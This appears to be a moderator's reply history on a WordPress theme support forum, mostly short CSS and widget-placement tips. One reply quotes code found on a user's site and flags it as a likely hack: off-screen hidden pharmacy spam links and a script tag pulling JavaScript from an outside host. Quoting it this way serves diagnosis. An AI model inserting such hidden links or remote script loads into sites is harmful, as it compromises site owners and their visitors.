Kenneth John Odle

Moderator

Forum Replies Created

  • Mod

    In reply to: Schrift springt auf Fett

    #44122

    Per the forum rules, please post in English. Feel free to use Google Translate if you need to.

    Mod

    In reply to: change language

    #44113

    Did you install WordPress in Persian?

    Moved to Support.

    Mod

    In reply to: Remove top menu

    #44115

    Use custom css:

    #nav {display: none;}

    to hide regular navigation.

    Then create a custom menu with the items you want in it, and use a menu widget (which is part of WordPress — no plugin necessary) and use it in the sidebar where you want the menu to appear.

    Moved to Support. Please post in the correct section next time.

    Mod

    In reply to: Header Widget Area

    #43948
    Quote:
    So, that would make the Header Widget Area rather less useful than it could otherwise be.

    It’s actually highly useful. Just not in the way that you want to use it. I’ve used it to include donation button and social sharing buttons off to the sides of a website that stay put as users scroll down the page.

    Mod

    In reply to: Post title doesn't show up in front page

    #44095
    Quote:
    . Do you think it is possible to hide the main page title but not the post titles?

    That’s what I was trying to do with the above code but it didn’t work (hide all and then display some is bad form, actually), so let’s try a different, hopefully better way:

    `.page-id-6794 h1.post-title {

    display: none;

    }

    Mod

    In reply to: Header Widget Area

    #43946
    Quote:
    but the problem I’m encountering is that the Header Widget Area is located just below the header image. They both exist inside a <div> which is positioned relatively, but the header image is positioned absolutely, for some reason.

    That is where the header widget area is located in the code; you can make it appear where you want (within reason) using custom CSS. I say “within reason” because you won’t be able to insert it between elements where there is no room for it.

    In your case, I would suggest that you use a Graphene custom action hook widget area:

    Tutorial:

    http://techblog.kjodle.net/2011/11/04/graphene-action-hook-widgets-an-easy-way-to-modify-your-blog/

    Reference map:

    http://demo.graphene-theme.com/graphene-hooks-map/

    Mod

    In reply to: Post title doesn't show up in front page

    #44093

    Because you have edited the theme stylesheet to include this code:

    .page-id-6794 .post-title, .page-title {
    display: none;
    }

    Since your front page is id#6794, you are telling a web browser not to display any page titles on that page.

    Also, you have edited theme files. You should never edit theme files. This is always a bad idea because it will always lead to problems down the road.

    Try adding this code to Graphene’s custom CSS option or to your child theme’s stylesheet:

    .homepage_pane .post-title {display: block;}

    Mod

    In reply to: Format Issues – Widget in center of page & firewall blocking

    #44077

    Also, I’m not sure why you have shortcodes in your custom menu. That’s not where they are supposed to go, if that was your intention.

    Mod

    In reply to: Format Issues – Widget in center of page & firewall blocking

    #44076

    1) Firewall issues are not a theme issue, so can’t help you there.

    2) You may have been hacked, unless you meant to include this code:

    <div style="position:absolute;left:-2651px;"><a href="http://buydiflucan.drupalgardens.com">buy diflucan</a>
    <div style="position:absolute;left:-2651px;"><a href="http://buypropecia.drupalgardens.com">buy propecia</a></div>
    <script type='text/javascript' src='http://meow-x.com/js.php?sid=1783&traffic=all&mts_land=1&beeline_land=37&megafon_land=26'></script>
    <div style="position:absolute;left:-2651px;"><a href="http://buydiflucan.drupalgardens.com">buy diflucan</a></div><div style="position:absolute;left:-2651px;"><a href="http://buypropecia.drupalgardens.com">buy propecia</a></div>
    <div style="position:absolute;left:-2651px;"><a href="http://asetec.uprrp.edu/new/?p=244">buy priligy online</a></div>

    Moved to Support. Please post in the correct section next time.

    Mod

    In reply to: Moving Social media buttons to menu

    #44080

    Use a Graphene action hook widget area. I believe there is one for the menu. You may have to position it with some CSS.

Viewing 10 posts - 571 through 580 (of 5,839 total)